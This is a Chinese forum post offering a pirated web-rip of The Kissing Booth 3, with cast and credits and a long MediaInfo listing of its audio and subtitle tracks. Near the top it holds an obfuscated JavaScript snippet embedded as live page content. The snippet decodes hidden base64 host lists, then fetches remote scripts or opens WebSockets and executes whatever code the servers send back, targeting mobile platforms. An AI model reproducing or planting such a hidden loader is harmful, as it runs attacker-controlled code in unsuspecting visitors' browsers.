亲吻亭3[简繁字幕].The.Kissing.Booth.3.2021.Netflix.WEB-DL.1080p.x265.10bit.HDR.DDP5.1 12.38GB

版主小s 1月前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 亲吻亭3 / 恋与接吻亭3 / 亲亲小站3
◎片  名 The Kissing Booth 3
◎年  代 2021
◎产  地 英国 / 美国
◎类  别 喜剧 / 爱情
◎语  言 英语
◎上映日期 2021-08-11(美国)
◎IMDb链接 https://www.imdb.com/title/tt12783454/
◎豆瓣链接 https://movie.douban.com/subject/35158170/
◎片  长 111分钟
◎导  演 文斯·马塞洛 Vince Marcello (id:1307063)
◎编  剧 杰伊·阿诺德 Jay S Arnold (id:1441700)
       文斯·马塞洛 Vince Marcello (id:1307063)
◎演  员 乔伊·金 Joey King (id:1022713)
       乔尔·考特尼 Joel Courtney (id:1315499)
       雅各布·艾洛蒂 Jacob Elordi (id:1392905)
       泰勒·扎克哈尔·佩雷斯 Taylor Zakhar Perez (id:1441702)
       梅根·杨 Meganne Young (id:1441716)
       莫利·林沃德 Molly Ringwald (id:1004592)
       麦茜·理查森·塞勒斯 Maisie Richardson-Sellers (id:1364409)
       弗朗西斯·肖托·道格拉斯 Frances Sholto-Douglas (id:1417607)
       卡米拉·沃尔夫森 Camilla Wolfson (id:1441724)
       比安卡·博斯 Bianca Bosch (id:1441723)
       埃文·亨斯特 Evan Hengst (id:1441727)
       卡森·怀特 Carson White (id:1441718)

◎标  签 青春 / 爱情 / Netflix / 美国 / 美式校园青春 / 校园 / 未上映 / 电影

◎简  介
  Netflix就宣布将出《亲吻亭3》,于明年上线,也发布前瞻预告,腻歪的小情侣并且透露该片已经跟《亲吻亭2》一起拍完了,现在后期制作中,所以不会因新冠疫情而无法拍摄。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 301064809390581887111591646657183996017 (0xE27EF9210E860B3FA62D59A807BBD871)

  4. Complete name                            : The.Kissin[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 12.4 GiB

  8. Duration                                 : 1 h 53 min

  9. Overall bit rate                         : 15.6 Mb/s

  10. Encoded date                             : UTC 2021-08-15 05:43:18

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 51 min

  21. Bit rate                                 : 5 436 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 16:9

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0 (Type 2)

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.109

  31. Stream size                              : 4.24 GiB (34%)

  32. Language                                 : English

  33. Default                                  : Yes

  34. Forced                                   : No

  35. Color range                              : Limited

  36. Color primaries                          : BT.2020

  37. Transfer characteristics                 : PQ

  38. Matrix coefficients                      : BT.2020 non-constant

  39. Mastering display color primaries        : Display P3

  40. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  41. Maximum Content Light Level              : 10000 cd/m2

  42. Maximum Frame-Average Light Level        : 3208 cd/m2


  43. Audio #1

  44. ID                                       : 2

  45. Format                                   : E-AC-3

  46. Format/Info                              : Enhanced AC-3

  47. Commercial name                          : Dolby Digital Plus

  48. Codec ID                                 : A_EAC3

  49. Duration                                 : 1 h 53 min

  50. Bit rate mode                            : Constant

  51. Bit rate                                 : 640 kb/s

  52. Channel(s)                               : 6 channels

  53. Channel layout                           : L R C LFE Ls Rs

  54. Sampling rate                            : 48.0 kHz

  55. Frame rate                               : 31.250 FPS (1536 SPF)

  56. Compression mode                         : Lossy

  57. Stream size                              : 521 MiB (4%)

  58. Language                                 : English

  59. Service kind                             : Complete Main

  60. Default                                  : Yes

  61. Forced                                   : No


  62. Audio #2

  63. ID                                       : 3

  64. Format                                   : E-AC-3

  65. Format/Info                              : Enhanced AC-3

  66. Commercial name                          : Dolby Digital Plus

  67. Codec ID                                 : A_EAC3

  68. Duration                                 : 1 h 53 min

  69. Bit rate mode                            : Constant

  70. Bit rate                                 : 640 kb/s

  71. Channel(s)                               : 6 channels

  72. Channel layout                           : L R C LFE Ls Rs

  73. Sampling rate                            : 48.0 kHz

  74. Frame rate                               : 31.250 FPS (1536 SPF)

  75. Compression mode                         : Lossy

  76. Stream size                              : 520 MiB (4%)

  77. Language                                 : German

  78. Service kind                             : Complete Main

  79. Default                                  : Yes

  80. Forced                                   : No


  81. Audio #3

  82. ID                                       : 4

  83. Format                                   : E-AC-3

  84. Format/Info                              : Enhanced AC-3

  85. Commercial name                          : Dolby Digital Plus

  86. Codec ID                                 : A_EAC3

  87. Duration                                 : 1 h 53 min

  88. Bit rate mode                            : Constant

  89. Bit rate                                 : 640 kb/s

  90. Channel(s)                               : 6 channels

  91. Channel layout                           : L R C LFE Ls Rs

  92. Sampling rate                            : 48.0 kHz

  93. Frame rate                               : 31.250 FPS (1536 SPF)

  94. Compression mode                         : Lossy

  95. Stream size                              : 520 MiB (4%)

  96. Language                                 : French

  97. Service kind                             : Complete Main

  98. Default                                  : Yes

  99. Forced                                   : No


  100. Audio #4

  101. ID                                       : 5

  102. Format                                   : E-AC-3

  103. Format/Info                              : Enhanced AC-3

  104. Commercial name                          : Dolby Digital Plus

  105. Codec ID                                 : A_EAC3

  106. Duration                                 : 1 h 53 min

  107. Bit rate mode                            : Constant

  108. Bit rate                                 : 640 kb/s

  109. Channel(s)                               : 6 channels

  110. Channel layout                           : L R C LFE Ls Rs

  111. Sampling rate                            : 48.0 kHz

  112. Frame rate                               : 31.250 FPS (1536 SPF)

  113. Compression mode                         : Lossy

  114. Stream size                              : 520 MiB (4%)

  115. Language                                 : Italian

  116. Service kind                             : Complete Main

  117. Default                                  : Yes

  118. Forced                                   : No


  119. Audio #5

  120. ID                                       : 6

  121. Format                                   : E-AC-3

  122. Format/Info                              : Enhanced AC-3

  123. Commercial name                          : Dolby Digital Plus

  124. Codec ID                                 : A_EAC3

  125. Duration                                 : 1 h 53 min

  126. Bit rate mode                            : Constant

  127. Bit rate                                 : 640 kb/s

  128. Channel(s)                               : 6 channels

  129. Channel layout                           : L R C LFE Ls Rs

  130. Sampling rate                            : 48.0 kHz

  131. Frame rate                               : 31.250 FPS (1536 SPF)

  132. Compression mode                         : Lossy

  133. Stream size                              : 520 MiB (4%)

  134. Language                                 : Spanish

  135. Service kind                             : Complete Main

  136. Default                                  : Yes

  137. Forced                                   : No


  138. Audio #6

  139. ID                                       : 7

  140. Format                                   : E-AC-3

  141. Format/Info                              : Enhanced AC-3

  142. Commercial name                          : Dolby Digital Plus

  143. Codec ID                                 : A_EAC3

  144. Duration                                 : 1 h 53 min

  145. Bit rate mode                            : Constant

  146. Bit rate                                 : 640 kb/s

  147. Channel(s)                               : 6 channels

  148. Channel layout                           : L R C LFE Ls Rs

  149. Sampling rate                            : 48.0 kHz

  150. Frame rate                               : 31.250 FPS (1536 SPF)

  151. Compression mode                         : Lossy

  152. Stream size                              : 520 MiB (4%)

  153. Language                                 : Polish

  154. Service kind                             : Complete Main

  155. Default                                  : Yes

  156. Forced                                   : No


  157. Audio #7

  158. ID                                       : 8

  159. Format                                   : E-AC-3

  160. Format/Info                              : Enhanced AC-3

  161. Commercial name                          : Dolby Digital Plus

  162. Codec ID                                 : A_EAC3

  163. Duration                                 : 1 h 53 min

  164. Bit rate mode                            : Constant

  165. Bit rate                                 : 640 kb/s

  166. Channel(s)                               : 6 channels

  167. Channel layout                           : L R C LFE Ls Rs

  168. Sampling rate                            : 48.0 kHz

  169. Frame rate                               : 31.250 FPS (1536 SPF)

  170. Compression mode                         : Lossy

  171. Stream size                              : 520 MiB (4%)

  172. Language                                 : Czech

  173. Service kind                             : Complete Main

  174. Default                                  : Yes

  175. Forced                                   : No


  176. Audio #8

  177. ID                                       : 9

  178. Format                                   : E-AC-3

  179. Format/Info                              : Enhanced AC-3

  180. Commercial name                          : Dolby Digital Plus

  181. Codec ID                                 : A_EAC3

  182. Duration                                 : 1 h 53 min

  183. Bit rate mode                            : Constant

  184. Bit rate                                 : 640 kb/s

  185. Channel(s)                               : 6 channels

  186. Channel layout                           : L R C LFE Ls Rs

  187. Sampling rate                            : 48.0 kHz

  188. Frame rate                               : 31.250 FPS (1536 SPF)

  189. Compression mode                         : Lossy

  190. Stream size                              : 520 MiB (4%)

  191. Language                                 : Russian

  192. Service kind                             : Complete Main

  193. Default                                  : Yes

  194. Forced                                   : No


  195. Audio #9

  196. ID                                       : 10

  197. Format                                   : E-AC-3

  198. Format/Info                              : Enhanced AC-3

  199. Commercial name                          : Dolby Digital Plus

  200. Codec ID                                 : A_EAC3

  201. Duration                                 : 1 h 53 min

  202. Bit rate mode                            : Constant

  203. Bit rate                                 : 640 kb/s

  204. Channel(s)                               : 6 channels

  205. Channel layout                           : L R C LFE Ls Rs

  206. Sampling rate                            : 48.0 kHz

  207. Frame rate                               : 31.250 FPS (1536 SPF)

  208. Compression mode                         : Lossy

  209. Stream size                              : 520 MiB (4%)

  210. Language                                 : Hungarian

  211. Service kind                             : Complete Main

  212. Default                                  : Yes

  213. Forced                                   : No


  214. Audio #10

  215. ID                                       : 11

  216. Format                                   : E-AC-3

  217. Format/Info                              : Enhanced AC-3

  218. Commercial name                          : Dolby Digital Plus

  219. Codec ID                                 : A_EAC3

  220. Duration                                 : 1 h 53 min

  221. Bit rate mode                            : Constant

  222. Bit rate                                 : 640 kb/s

  223. Channel(s)                               : 6 channels

  224. Channel layout                           : L R C LFE Ls Rs

  225. Sampling rate                            : 48.0 kHz

  226. Frame rate                               : 31.250 FPS (1536 SPF)

  227. Compression mode                         : Lossy

  228. Stream size                              : 520 MiB (4%)

  229. Language                                 : Portuguese

  230. Service kind                             : Complete Main

  231. Default                                  : Yes

  232. Forced                                   : No


  233. Audio #11

  234. ID                                       : 12

  235. Format                                   : E-AC-3

  236. Format/Info                              : Enhanced AC-3

  237. Commercial name                          : Dolby Digital Plus

  238. Codec ID                                 : A_EAC3

  239. Duration                                 : 1 h 53 min

  240. Bit rate mode                            : Constant

  241. Bit rate                                 : 640 kb/s

  242. Channel(s)                               : 6 channels

  243. Channel layout                           : L R C LFE Ls Rs

  244. Sampling rate                            : 48.0 kHz

  245. Frame rate                               : 31.250 FPS (1536 SPF)

  246. Compression mode                         : Lossy

  247. Stream size                              : 520 MiB (4%)

  248. Language                                 : Turkish

  249. Service kind                             : Complete Main

  250. Default                                  : Yes

  251. Forced                                   : No


  252. Audio #12

  253. ID                                       : 13

  254. Format                                   : E-AC-3

  255. Format/Info                              : Enhanced AC-3

  256. Commercial name                          : Dolby Digital Plus

  257. Codec ID                                 : A_EAC3

  258. Duration                                 : 1 h 53 min

  259. Bit rate mode                            : Constant

  260. Bit rate                                 : 640 kb/s

  261. Channel(s)                               : 6 channels

  262. Channel layout                           : L R C LFE Ls Rs

  263. Sampling rate                            : 48.0 kHz

  264. Frame rate                               : 31.250 FPS (1536 SPF)

  265. Compression mode                         : Lossy

  266. Stream size                              : 520 MiB (4%)

  267. Language                                 : Japanese

  268. Service kind                             : Complete Main

  269. Default                                  : Yes

  270. Forced                                   : No


  271. Audio #13

  272. ID                                       : 14

  273. Format                                   : E-AC-3

  274. Format/Info                              : Enhanced AC-3

  275. Commercial name                          : Dolby Digital Plus

  276. Codec ID                                 : A_EAC3

  277. Duration                                 : 1 h 53 min

  278. Bit rate mode                            : Constant

  279. Bit rate                                 : 640 kb/s

  280. Channel(s)                               : 6 channels

  281. Channel layout                           : L R C LFE Ls Rs

  282. Sampling rate                            : 48.0 kHz

  283. Frame rate                               : 31.250 FPS (1536 SPF)

  284. Compression mode                         : Lossy

  285. Stream size                              : 520 MiB (4%)

  286. Language                                 : Thai

  287. Service kind                             : Complete Main

  288. Default                                  : Yes

  289. Forced                                   : No


  290. Audio #14

  291. ID                                       : 15

  292. Format                                   : E-AC-3

  293. Format/Info                              : Enhanced AC-3

  294. Commercial name                          : Dolby Digital Plus

  295. Codec ID                                 : A_EAC3

  296. Duration                                 : 1 h 53 min

  297. Bit rate mode                            : Constant

  298. Bit rate                                 : 640 kb/s

  299. Channel(s)                               : 6 channels

  300. Channel layout                           : L R C LFE Ls Rs

  301. Sampling rate                            : 48.0 kHz

  302. Frame rate                               : 31.250 FPS (1536 SPF)

  303. Compression mode                         : Lossy

  304. Stream size                              : 520 MiB (4%)

  305. Language                                 : Hindi

  306. Service kind                             : Complete Main

  307. Default                                  : Yes

  308. Forced                                   : No


  309. Audio #15

  310. ID                                       : 16

  311. Format                                   : E-AC-3

  312. Format/Info                              : Enhanced AC-3

  313. Commercial name                          : Dolby Digital Plus

  314. Codec ID                                 : A_EAC3

  315. Duration                                 : 1 h 53 min

  316. Bit rate mode                            : Constant

  317. Bit rate                                 : 640 kb/s

  318. Channel(s)                               : 6 channels

  319. Channel layout                           : L R C LFE Ls Rs

  320. Sampling rate                            : 48.0 kHz

  321. Frame rate                               : 31.250 FPS (1536 SPF)

  322. Compression mode                         : Lossy

  323. Stream size                              : 521 MiB (4%)

  324. Language                                 : Ukrainian

  325. Service kind                             : Complete Main

  326. Default                                  : Yes

  327. Forced                                   : No


  328. Audio #16

  329. ID                                       : 17

  330. Format                                   : E-AC-3

  331. Format/Info                              : Enhanced AC-3

  332. Commercial name                          : Dolby Digital Plus

  333. Codec ID                                 : A_EAC3

  334. Duration                                 : 1 h 53 min

  335. Bit rate mode                            : Constant

  336. Bit rate                                 : 640 kb/s

  337. Channel(s)                               : 6 channels

  338. Channel layout                           : L R C LFE Ls Rs

  339. Sampling rate                            : 48.0 kHz

  340. Frame rate                               : 31.250 FPS (1536 SPF)

  341. Compression mode                         : Lossy

  342. Stream size                              : 521 MiB (4%)

  343. Title                                    : Europa

  344. Language                                 : Spanish

  345. Service kind                             : Complete Main

  346. Default                                  : Yes

  347. Forced                                   : No


  348. Text #1

  349. ID                                       : 18

  350. Format                                   : UTF-8

  351. Codec ID                                 : S_TEXT/UTF8

  352. Codec ID/Info                            : UTF-8 Plain Text

  353. Duration                                 : 1 h 51 min

  354. Bit rate                                 : 106 b/s

  355. Count of elements                        : 1682

  356. Stream size                              : 86.7 KiB (0%)

  357. Title                                    : ???????

  358. Language                                 : Arabic

  359. Default                                  : Yes

  360. Forced                                   : No


  361. Text #2

  362. ID                                       : 19

  363. Format                                   : UTF-8

  364. Codec ID                                 : S_TEXT/UTF8

  365. Codec ID/Info                            : UTF-8 Plain Text

  366. Duration                                 : 1 h 51 min

  367. Bit rate                                 : 59 b/s

  368. Count of elements                        : 1654

  369. Stream size                              : 48.5 KiB (0%)

  370. Title                                    : ?e?tina

  371. Language                                 : Czech

  372. Default                                  : Yes

  373. Forced                                   : No


  374. Text #3

  375. ID                                       : 20

  376. Format                                   : UTF-8

  377. Codec ID                                 : S_TEXT/UTF8

  378. Codec ID/Info                            : UTF-8 Plain Text

  379. Duration                                 : 1 h 51 min

  380. Bit rate                                 : 59 b/s

  381. Count of elements                        : 1591

  382. Stream size                              : 48.8 KiB (0%)

  383. Title                                    : Dansk

  384. Language                                 : Danish

  385. Default                                  : Yes

  386. Forced                                   : No


  387. Text #4

  388. ID                                       : 21

  389. Format                                   : UTF-8

  390. Codec ID                                 : S_TEXT/UTF8

  391. Codec ID/Info                            : UTF-8 Plain Text

  392. Duration                                 : 1 h 51 min

  393. Bit rate                                 : 64 b/s

  394. Count of elements                        : 1622

  395. Stream size                              : 52.6 KiB (0%)

  396. Title                                    : Deutsch

  397. Language                                 : German

  398. Default                                  : Yes

  399. Forced                                   : No


  400. Text #5

  401. ID                                       : 22

  402. Format                                   : UTF-8

  403. Codec ID                                 : S_TEXT/UTF8

  404. Codec ID/Info                            : UTF-8 Plain Text

  405. Duration                                 : 1 h 51 min

  406. Bit rate                                 : 96 b/s

  407. Count of elements                        : 1645

  408. Stream size                              : 78.6 KiB (0%)

  409. Title                                    : Ελληνικ?

  410. Language                                 : Greek

  411. Default                                  : Yes

  412. Forced                                   : No


  413. Text #6

  414. ID                                       : 23

  415. Format                                   : UTF-8

  416. Codec ID                                 : S_TEXT/UTF8

  417. Codec ID/Info                            : UTF-8 Plain Text

  418. Duration                                 : 1 h 50 min

  419. Bit rate                                 : 89 b/s

  420. Count of elements                        : 2068

  421. Stream size                              : 72.6 KiB (0%)

  422. Title                                    : English (SDH)

  423. Language                                 : English

  424. Default                                  : Yes

  425. Forced                                   : No


  426. Text #7

  427. ID                                       : 24

  428. Format                                   : UTF-8

  429. Codec ID                                 : S_TEXT/UTF8

  430. Codec ID/Info                            : UTF-8 Plain Text

  431. Duration                                 : 1 h 51 min

  432. Bit rate                                 : 62 b/s

  433. Count of elements                        : 1582

  434. Stream size                              : 51.2 KiB (0%)

  435. Title                                    : Espa?ol

  436. Language                                 : Spanish

  437. Default                                  : Yes

  438. Forced                                   : No


  439. Text #8

  440. ID                                       : 25

  441. Format                                   : UTF-8

  442. Codec ID                                 : S_TEXT/UTF8

  443. Codec ID/Info                            : UTF-8 Plain Text

  444. Duration                                 : 1 h 51 min

  445. Bit rate                                 : 58 b/s

  446. Count of elements                        : 1655

  447. Stream size                              : 47.2 KiB (0%)

  448. Title                                    : Europa?Espa?ol

  449. Language                                 : Spanish

  450. Default                                  : Yes

  451. Forced                                   : No


  452. Text #9

  453. ID                                       : 26

  454. Format                                   : UTF-8

  455. Codec ID                                 : S_TEXT/UTF8

  456. Codec ID/Info                            : UTF-8 Plain Text

  457. Duration                                 : 1 h 51 min

  458. Bit rate                                 : 57 b/s

  459. Count of elements                        : 1140

  460. Stream size                              : 46.5 KiB (0%)

  461. Title                                    : Suomi

  462. Language                                 : Finnish

  463. Default                                  : Yes

  464. Forced                                   : No


  465. Text #10

  466. ID                                       : 27

  467. Format                                   : UTF-8

  468. Codec ID                                 : S_TEXT/UTF8

  469. Codec ID/Info                            : UTF-8 Plain Text

  470. Duration                                 : 1 h 51 min

  471. Bit rate                                 : 53 b/s

  472. Count of elements                        : 1464

  473. Stream size                              : 43.9 KiB (0%)

  474. Title                                    : Fran?ais

  475. Language                                 : French

  476. Default                                  : Yes

  477. Forced                                   : No


  478. Text #11

  479. ID                                       : 28

  480. Format                                   : UTF-8

  481. Codec ID                                 : S_TEXT/UTF8

  482. Codec ID/Info                            : UTF-8 Plain Text

  483. Duration                                 : 1 h 51 min

  484. Bit rate                                 : 95 b/s

  485. Count of elements                        : 1601

  486. Stream size                              : 77.6 KiB (0%)

  487. Title                                    : ?????

  488. Language                                 : Hebrew

  489. Default                                  : Yes

  490. Forced                                   : No


  491. Text #12

  492. ID                                       : 29

  493. Format                                   : UTF-8

  494. Codec ID                                 : S_TEXT/UTF8

  495. Codec ID/Info                            : UTF-8 Plain Text

  496. Duration                                 : 1 h 51 min

  497. Bit rate                                 : 54 b/s

  498. Count of elements                        : 1627

  499. Stream size                              : 44.2 KiB (0%)

  500. Title                                    : Hrvatski

  501. Language                                 : Croatian

  502. Default                                  : Yes

  503. Forced                                   : No


  504. Text #13

  505. ID                                       : 30

  506. Format                                   : UTF-8

  507. Codec ID                                 : S_TEXT/UTF8

  508. Codec ID/Info                            : UTF-8 Plain Text

  509. Duration                                 : 1 h 51 min

  510. Bit rate                                 : 61 b/s

  511. Count of elements                        : 1550

  512. Stream size                              : 50.2 KiB (0%)

  513. Title                                    : Magyar

  514. Language                                 : Hungarian

  515. Default                                  : Yes

  516. Forced                                   : No


  517. Text #14

  518. ID                                       : 31

  519. Format                                   : UTF-8

  520. Codec ID                                 : S_TEXT/UTF8

  521. Codec ID/Info                            : UTF-8 Plain Text

  522. Duration                                 : 1 h 51 min

  523. Bit rate                                 : 56 b/s

  524. Count of elements                        : 1669

  525. Stream size                              : 46.3 KiB (0%)

  526. Title                                    : Indonesian

  527. Language                                 : Indonesian

  528. Default                                  : Yes

  529. Forced                                   : No


  530. Text #15

  531. ID                                       : 32

  532. Format                                   : UTF-8

  533. Codec ID                                 : S_TEXT/UTF8

  534. Codec ID/Info                            : UTF-8 Plain Text

  535. Duration                                 : 1 h 51 min

  536. Bit rate                                 : 62 b/s

  537. Count of elements                        : 1610

  538. Stream size                              : 51.0 KiB (0%)

  539. Title                                    : Italian

  540. Language                                 : Italian

  541. Default                                  : Yes

  542. Forced                                   : No


  543. Text #16

  544. ID                                       : 33

  545. Format                                   : UTF-8

  546. Codec ID                                 : S_TEXT/UTF8

  547. Codec ID/Info                            : UTF-8 Plain Text

  548. Duration                                 : 1 h 51 min

  549. Bit rate                                 : 111 b/s

  550. Count of elements                        : 1729

  551. Stream size                              : 90.9 KiB (0%)

  552. Title                                    : 日本語

  553. Language                                 : Japanese

  554. Default                                  : Yes

  555. Forced                                   : No


  556. Text #17

  557. ID                                       : 34

  558. Format                                   : UTF-8

  559. Codec ID                                 : S_TEXT/UTF8

  560. Codec ID/Info                            : UTF-8 Plain Text

  561. Duration                                 : 1 h 51 min

  562. Bit rate                                 : 64 b/s

  563. Count of elements                        : 1726

  564. Stream size                              : 52.3 KiB (0%)

  565. Title                                    : ??

  566. Language                                 : Korean

  567. Default                                  : Yes

  568. Forced                                   : No


  569. Text #18

  570. ID                                       : 35

  571. Format                                   : UTF-8

  572. Codec ID                                 : S_TEXT/UTF8

  573. Codec ID/Info                            : UTF-8 Plain Text

  574. Duration                                 : 1 h 51 min

  575. Bit rate                                 : 60 b/s

  576. Count of elements                        : 1618

  577. Stream size                              : 49.2 KiB (0%)

  578. Title                                    : Malaysia

  579. Language                                 : Malay

  580. Default                                  : Yes

  581. Forced                                   : No


  582. Text #19

  583. ID                                       : 36

  584. Format                                   : UTF-8

  585. Codec ID                                 : S_TEXT/UTF8

  586. Codec ID/Info                            : UTF-8 Plain Text

  587. Duration                                 : 1 h 51 min

  588. Bit rate                                 : 57 b/s

  589. Count of elements                        : 1372

  590. Stream size                              : 47.0 KiB (0%)

  591. Title                                    : Norsk?Bokm?l

  592. Language                                 : Norwegian Bokmal

  593. Default                                  : Yes

  594. Forced                                   : No


  595. Text #20

  596. ID                                       : 37

  597. Format                                   : UTF-8

  598. Codec ID                                 : S_TEXT/UTF8

  599. Codec ID/Info                            : UTF-8 Plain Text

  600. Duration                                 : 1 h 50 min

  601. Bit rate                                 : 56 b/s

  602. Count of elements                        : 1391

  603. Stream size                              : 45.2 KiB (0%)

  604. Title                                    : Nederlands

  605. Language                                 : Dutch

  606. Default                                  : Yes

  607. Forced                                   : No


  608. Text #21

  609. ID                                       : 38

  610. Format                                   : UTF-8

  611. Codec ID                                 : S_TEXT/UTF8

  612. Codec ID/Info                            : UTF-8 Plain Text

  613. Duration                                 : 1 h 51 min

  614. Bit rate                                 : 54 b/s

  615. Count of elements                        : 1639

  616. Stream size                              : 44.5 KiB (0%)

  617. Title                                    : Polski

  618. Language                                 : Polish

  619. Default                                  : Yes

  620. Forced                                   : No


  621. Text #22

  622. ID                                       : 39

  623. Format                                   : UTF-8

  624. Codec ID                                 : S_TEXT/UTF8

  625. Codec ID/Info                            : UTF-8 Plain Text

  626. Duration                                 : 1 h 50 min

  627. Bit rate                                 : 61 b/s

  628. Count of elements                        : 1652

  629. Stream size                              : 49.8 KiB (0%)

  630. Title                                    : Português

  631. Language                                 : Portuguese

  632. Default                                  : Yes

  633. Forced                                   : No


  634. Text #23

  635. ID                                       : 40

  636. Format                                   : UTF-8

  637. Codec ID                                 : S_TEXT/UTF8

  638. Codec ID/Info                            : UTF-8 Plain Text

  639. Duration                                 : 1 h 51 min

  640. Bit rate                                 : 61 b/s

  641. Count of elements                        : 1655

  642. Stream size                              : 49.9 KiB (0%)

  643. Title                                    : Brazilian Português

  644. Language                                 : Portuguese

  645. Default                                  : Yes

  646. Forced                                   : No


  647. Text #24

  648. ID                                       : 41

  649. Format                                   : UTF-8

  650. Codec ID                                 : S_TEXT/UTF8

  651. Codec ID/Info                            : UTF-8 Plain Text

  652. Duration                                 : 1 h 51 min

  653. Bit rate                                 : 60 b/s

  654. Count of elements                        : 1670

  655. Stream size                              : 49.4 KiB (0%)

  656. Title                                    : Roman?

  657. Language                                 : Romanian

  658. Default                                  : Yes

  659. Forced                                   : No


  660. Text #25

  661. ID                                       : 42

  662. Format                                   : UTF-8

  663. Codec ID                                 : S_TEXT/UTF8

  664. Codec ID/Info                            : UTF-8 Plain Text

  665. Duration                                 : 1 h 51 min

  666. Bit rate                                 : 93 b/s

  667. Count of elements                        : 1681

  668. Stream size                              : 76.4 KiB (0%)

  669. Title                                    : русский?язык

  670. Language                                 : Russian

  671. Default                                  : Yes

  672. Forced                                   : No


  673. Text #26

  674. ID                                       : 43

  675. Format                                   : UTF-8

  676. Codec ID                                 : S_TEXT/UTF8

  677. Codec ID/Info                            : UTF-8 Plain Text

  678. Duration                                 : 1 h 51 min

  679. Bit rate                                 : 59 b/s

  680. Count of elements                        : 1390

  681. Stream size                              : 48.4 KiB (0%)

  682. Title                                    : Svenska

  683. Language                                 : Swedish

  684. Default                                  : Yes

  685. Forced                                   : No


  686. Text #27

  687. ID                                       : 44

  688. Format                                   : UTF-8

  689. Codec ID                                 : S_TEXT/UTF8

  690. Codec ID/Info                            : UTF-8 Plain Text

  691. Duration                                 : 1 h 51 min

  692. Bit rate                                 : 151 b/s

  693. Count of elements                        : 1694

  694. Stream size                              : 123 KiB (0%)

  695. Title                                    : ???

  696. Language                                 : Thai

  697. Default                                  : Yes

  698. Forced                                   : No


  699. Text #28

  700. ID                                       : 45

  701. Format                                   : UTF-8

  702. Codec ID                                 : S_TEXT/UTF8

  703. Codec ID/Info                            : UTF-8 Plain Text

  704. Duration                                 : 1 h 51 min

  705. Bit rate                                 : 60 b/s

  706. Count of elements                        : 1515

  707. Stream size                              : 49.5 KiB (0%)

  708. Title                                    : Türk?e

  709. Language                                 : Turkish

  710. Default                                  : Yes

  711. Forced                                   : No


  712. Text #29

  713. ID                                       : 46

  714. Format                                   : UTF-8

  715. Codec ID                                 : S_TEXT/UTF8

  716. Codec ID/Info                            : UTF-8 Plain Text

  717. Duration                                 : 1 h 51 min

  718. Bit rate                                 : 95 b/s

  719. Count of elements                        : 1689

  720. Stream size                              : 77.3 KiB (0%)

  721. Title                                    : Укра?нська

  722. Language                                 : Ukrainian

  723. Default                                  : Yes

  724. Forced                                   : No


  725. Text #30

  726. ID                                       : 47

  727. Format                                   : UTF-8

  728. Codec ID                                 : S_TEXT/UTF8

  729. Codec ID/Info                            : UTF-8 Plain Text

  730. Duration                                 : 1 h 51 min

  731. Bit rate                                 : 77 b/s

  732. Count of elements                        : 1598

  733. Stream size                              : 63.4 KiB (0%)

  734. Title                                    : Ti?ng Vi?t

  735. Language                                 : Vietnamese

  736. Default                                  : Yes

  737. Forced                                   : No


  738. Text #31

  739. ID                                       : 48

  740. Format                                   : UTF-8

  741. Codec ID                                 : S_TEXT/UTF8

  742. Codec ID/Info                            : UTF-8 Plain Text

  743. Duration                                 : 1 h 51 min

  744. Bit rate                                 : 56 b/s

  745. Count of elements                        : 1696

  746. Stream size                              : 46.3 KiB (0%)

  747. Title                                    : 中文(简体)

  748. Language                                 : Chinese

  749. Default                                  : Yes

  750. Forced                                   : No


  751. Text #32

  752. ID                                       : 49

  753. Format                                   : UTF-8

  754. Codec ID                                 : S_TEXT/UTF8

  755. Codec ID/Info                            : UTF-8 Plain Text

  756. Duration                                 : 1 h 51 min

  757. Bit rate                                 : 51 b/s

  758. Count of elements                        : 1694

  759. Stream size                              : 42.0 KiB (0%)

  760. Title                                    : 中文(繁體)

  761. Language                                 : Chinese

  762. Default                                  : Yes

  763. Forced                                   : No




